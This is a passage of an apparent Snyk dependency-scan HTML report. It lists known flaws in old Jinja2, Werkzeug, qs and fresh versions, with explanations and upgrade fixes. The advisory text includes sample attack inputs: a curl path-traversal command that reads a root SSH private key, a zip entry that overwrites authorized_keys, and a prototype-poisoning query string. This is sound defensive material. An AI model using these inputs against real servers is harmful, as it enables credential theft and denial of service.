+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-174126" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">81</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting (XSS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-6150717</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the <code>xmlattr</code> filter, when using keys containing spaces in an application accepts keys as user input. An attacker can inject arbitrary HTML attributes into the rendered HTML template, bypassing the auto-escaping mechanism, which may lead to the execution of untrusted scripts in the context of the user&#39;s browser session.</p><p><strong>Note</strong></p><p>Accepting keys as user input is not common or a particularly intended use case of the <code>xmlattr</code> filter, and an application doing so should already be verifying what keys are provided regardless of this fix.</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 3.1.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/7dd3680e6eea0d77fde024763657aa4d884ddb23" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/jinja/releases/tag/3.1.3" target="_blank" rel="noopener noreferrer">GitHub Release</a></li><li><a href="https://snyk.io/blog/jinja2-xss-vulnerability/" target="_blank" rel="noopener noreferrer">Snyk Blog</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-6150717" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">82</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting (XSS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-6809379</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Cross-site Scripting (XSS) through the <code>xmlattr</code> filter. An attacker can manipulate the output of web pages by injecting additional attributes into elements, potentially leading to unauthorized actions or information disclosure.</p><p><strong>Note:</strong></p><p>This vulnerability derives from an improper fix of <a href="https://security.snyk.io/vuln/SNYK-PYTHON-JINJA2-6150717" target="_blank" rel="noopener noreferrer">CVE-2024-22195</a>, which only addressed spaces but not other characters.</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 3.1.4 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/0668239dc6b44ef38e7a6c9f91f312fd4ca581cb" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-6809379" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">98</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Template Injection</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-8548181</li>
+      <li class="card-meta-item">CWE-1336</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Template Injection when an attacker controls the content of a template. This is due to an oversight in the sandboxed environment&#39;s method detection when using a stored reference to a malicious string&#39;s <code>format</code> method, which can then be executed through a filter.</p><p><strong>Note:</strong> This is only exploitable through custom filters in an application.</p><h2>Remediation</h2><p>Upgrade <code>jinja2</code> to version 3.1.5 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/jinja/releases/tag/3.1.5" target="_blank" rel="noopener noreferrer">GitHub Release</a></li><li><a href="https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-5" target="_blank" rel="noopener noreferrer">Jinja Chnanges</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-8548181" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">190</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Improper Neutralization</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-8548987</li>
+      <li class="card-meta-item">CWE-150</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Improper Neutralization when importing a macro in a template whose filename is also a template. This will result in a <code>SyntaxError: f-string: invalid syntax</code> error message because the filename is not properly escaped, indicating that it is being treated as a format string.</p><p><strong>Note:</strong> This is only exploitable when the attacker controls both the content and filename of a template and the application executes untrusted templates.</p><h2>Remediation</h2><p>Upgrade <code>jinja2</code> to version 3.1.5 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/jinja/issues/1792" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li><li><a href="https://github.com/pallets/jinja/pull/1852" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://github.com/pallets/jinja/releases/tag/3.1.5" target="_blank" rel="noopener noreferrer">GitHub Release</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-8548987" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">190</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Template Injection</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-JINJA2-9292516</li>
+      <li class="card-meta-item">CWE-1336</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> jinja2@2.7.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; jinja2@2.7.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; jinja2@2.7.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://pypi.org/project/Jinja2/" target="_blank" rel="noopener noreferrer">Jinja2</a> is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.</p><p>Affected versions of this package are vulnerable to Template Injection through the <code>|attr</code> filter. An attacker that controls the content of a template can escape the sandbox and execute arbitrary Python code by using the <code>|attr</code> filter to get a reference to a string&#39;s plain format method, bypassing the environment&#39;s attribute lookup.</p><p><strong>Note:</strong></p><p>This is only exploitable if the application executes untrusted templates.</p><h2>Remediation</h2><p>Upgrade <code>Jinja2</code> to version 3.1.6 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-JINJA2-9292516" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">53</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Directory Traversal</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-WERKZEUG-8309091</li>
+      <li class="card-meta-item">CWE-22</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> werkzeug@3.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; werkzeug@3.0.1</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; werkzeug@3.0.1</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://werkzeug.palletsprojects.com/" target="_blank" rel="noopener noreferrer">Werkzeug</a> is a WSGI web application library.</p><p>Affected versions of this package are vulnerable to Directory Traversal due to a bypass for <code>os.path.isabs()</code>, which allows the improper handling of UNC paths beginning with <code>/</code>, in the <code>safe_join()</code> function. This allows an attacker to read some files on the affected server, if they are stored in an affected path.</p><p><strong>Note:</strong> This is only exploitable on Windows systems using Python versions prior to 3.11.</p><h2>Details</h2><p>A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with &#34;dot-dot-slash (../)&#34; sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.</p><p>Directory Traversal vulnerabilities can be generally divided into two types:</p><ul><li><strong>Information Disclosure</strong>: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.</li></ul><p><code>st</code> is a module for serving static files on web pages, and contains a <a href="https://snyk.io/vuln/npm:st:20140206" target="_blank" rel="noopener noreferrer">vulnerability of this type</a>. In our example, we will serve files from the <code>public</code> route.</p><p>If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.</p><pre><code>curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
+</code></pre><p><strong>Note</strong> <code>%2e</code> is the URL encoded version of <code>.</code> (dot).</p><ul><li><strong>Writing arbitrary files</strong>: Allows the attacker to create or replace existing files. This type of vulnerability is also known as <code>Zip-Slip</code>.</li></ul><p>One way to achieve this is by using a malicious <code>zip</code> archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.</p><p>The following is an example of a <code>zip</code> archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in <code>/root/.ssh/</code> overwriting the <code>authorized_keys</code> file:</p><pre><code>2018-04-15 22:04:29 .....           19           19  good.txt
+2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys
+</code></pre><h2>Remediation</h2><p>Upgrade <code>Werkzeug</code> to version 3.0.6 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/werkzeug/commit/2767bcb10a7dd1c297d812cc5e6d11a474c1f092" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-WERKZEUG-8309091" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">61</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Allocation of Resources Without Limits or Throttling</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-PYTHON-WERKZEUG-8309092</li>
+      <li class="card-meta-item">CWE-770</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> werkzeug@3.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">python@0.0.0 &#x203A; werkzeug@3.0.1</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">python@0.0.0 &#x203A; flask@3.0.0 &#x203A; werkzeug@3.0.1</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in <code>formparser.MultiPartParser()</code>. An attacker can cause the parser to consume more memory than the upload size, in excess of <code>max_form_memory_size</code>, by sending malicious data in a non-file field of a  <code>multipart/form-data</code> request.</p><h2>Remediation</h2><p>Upgrade <code>werkzeug</code> to version 3.0.6 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pallets/quart/commit/5e78c4169b8eb66b91ead3e62d44721b9e1644ee" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/werkzeug/commit/50cfeebcb0727e18cc52ffbeb125f4a66551179b" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/pallets/werkzeug/releases/tag/3.0.6" target="_blank" rel="noopener noreferrer">GitHub Release</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-PYTHON-WERKZEUG-8309092" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Software Composition Analysis</span>
+    <span class="meta-label">Project path</span><span class="meta-value">multi-project</span>
+    <span class="meta-label">Project</span><span class="meta-value">tsc</span>
+    <span class="meta-label">Target file</span><span class="meta-value">tsc/package.json (23 dependencies)</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 19</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">5 HIGH</span>
+    <span class="severity-badge" style="background:#D68000">10 MEDIUM</span>
+    <span class="severity-badge" style="background:#88879E">4 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Security Issues (19)</h2></summary>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">150</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Prototype Poisoning</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-QS-3153490</li>
+      <li class="card-meta-item">CWE-1321</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> qs@0.6.6</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; qs@0.6.6</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/qs" target="_blank" rel="noopener noreferrer">qs</a> is a querystring parser that supports nesting and arrays, with a depth limit.</p><p>Affected versions of this package are vulnerable to Prototype Poisoning which allows attackers to cause a Node process to hang, processing an Array object whose prototype has been replaced by one with an excessive length value.</p><p><strong>Note:</strong> In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as <code>a[__proto__]=b&amp;a[__proto__]&amp;a[length]=100000000</code>.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>qs</code> to version 6.2.4, 6.3.3, 6.4.1, 6.5.3, 6.6.1, 6.7.3, 6.8.3, 6.9.7, 6.10.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/ljharb/qs/pull/428" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2150323" target="_blank" rel="noopener noreferrer">RedHat Bugzilla Bug</a></li><li><a href="https://github.com/n8tz/CVE-2022-24999" target="_blank" rel="noopener noreferrer">Researcher Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-QS-3153490" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">101</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:fresh:20170908</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> fresh@0.2.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; fresh@0.2.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 2 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; send@0.2.0 &#x203A; fresh@0.2.2</div>
+        <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4 &#x203A; fresh@0.2.0</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/fresh" target="_blank" rel="noopener noreferrer"><code>fresh</code></a> is HTTP response freshness testing.</p><p>Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks. A Regular Expression (<code>/ *, */</code>) was used for parsing HTTP headers and take about 2 seconds matching time for 50k characters.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
